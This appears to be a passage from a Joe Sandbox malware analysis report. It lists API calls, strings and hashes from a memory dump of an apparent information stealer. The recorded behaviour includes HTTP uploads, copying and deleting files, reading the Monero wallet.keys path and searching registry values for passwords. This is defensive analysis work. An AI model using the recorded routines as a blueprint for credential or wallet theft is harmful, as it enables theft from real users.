InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,04280630,?,04287D60,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,042804C0,00000000,?,04287608,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
RtlAllocateHeap.NTDLL(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 00404F4B
--, xrefs: 00404F34
", xrefs: 00405278
------, xrefs: 004051AD
------, xrefs: 004052EF
", xrefs: 004053BA
------, xrefs: 0040506B
", xrefs: 00405136
J&f, xrefs: 00405029

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 1133489818-3705675087
Opcode ID: 50250b88df09d1754456c93c8d6d4ea64b2adeb1fe873aa331ae21fe0e8921fc
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 50250b88df09d1754456c93c8d6d4ea64b2adeb1fe873aa331ae21fe0e8921fc
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,042805E0), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,04288330,00000000,?,04287608,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,04280630,?,04287D60,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

------, xrefs: 00405746
------, xrefs: 004058BB
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
", xrefs: 00405985
------, xrefs: 004059FC
-A, xrefs: 00405620, 00405D27, 00405623
J&f, xrefs: 00405878
", xrefs: 00405AC6

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: a6d19e4e8c1b87aae1745ef3956fd36a143f34ebc49faef73d78e3bf82fc9fa2
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: a6d19e4e8c1b87aae1745ef3956fd36a143f34ebc49faef73d78e3bf82fc9fa2
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04280410,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: bea0ef59a5f4ea4d1abf2c1a0ca1c3830080ada747492e5fc3dee98a0f3580c4
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: bea0ef59a5f4ea4d1abf2c1a0ca1c3830080ada747492e5fc3dee98a0f3580c4
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287248,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04280410,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: db7f4d7d8fd3937116d43568b3be872a72d5b9633bb5ae0d567d30449e41d663
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: db7f4d7d8fd3937116d43568b3be872a72d5b9633bb5ae0d567d30449e41d663
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,042805E0), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04280660), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,04280630,?,04287D60,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

------, xrefs: 0040467D
", xrefs: 004048B2
------, xrefs: 004047E8
------, xrefs: 00404929
", xrefs: 004049F3
J&f, xrefs: 004047A5

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: 0c5e3f9f1f67659b7510d9d5fe3ea0cf334ed91422ca1925a29fdfc89eeb00e5
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: 0c5e3f9f1f67659b7510d9d5fe3ea0cf334ed91422ca1925a29fdfc89eeb00e5
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,04280CE8,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

?, xrefs: 00414B17
%s\%s, xrefs: 00414BEA
- , xrefs: 00414D40

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 837f5191a6419d24b2357482a28c77488815408775a6b45f69e1e6e65526e68f
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: 837f5191a6419d24b2357482a28c77488815408775a6b45f69e1e6e65526e68f
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04280410,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 6444c30339089649f73b0a44eb3ff7784d611359391cbef4e68e220448da48b2
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: 6444c30339089649f73b0a44eb3ff7784d611359391cbef4e68e220448da48b2
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287248,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042805E0), ref: 00404ED9

Strings

wallet_path, xrefs: 004012F0
SOFTWARE\monero-project\monero-core, xrefs: 004012F5
\Monero\wallet.keys, xrefs: 0040134D
.keys, xrefs: 0040132B

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: 466b6b32454e33892797bfb329d65e855d058e5100d44849c2f48c5364a6f352
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: 466b6b32454e33892797bfb329d65e855d058e5100d44849c2f48c5364a6f352
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(36A27020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(36A27020,00000000), ref: 00407018
lstrcat.KERNEL32(36A27020, : ), ref: 0040702A
lstrcat.KERNEL32(36A27020,00000000), ref: 0040705F
lstrcat.KERNEL32(36A27020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(36A27020,00000000), ref: 004070A3
lstrcat.KERNEL32(36A27020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

h0A, xrefs: 00406FA6, 00406FA9
`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2
: , xrefs: 0040701E

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 52ede2cf8f2cd1a362df80a4364684df414fc35994512c53c6e3b72a4fcb314f
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 52ede2cf8f2cd1a362df80a4364684df414fc35994512c53c6e3b72a4fcb314f
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

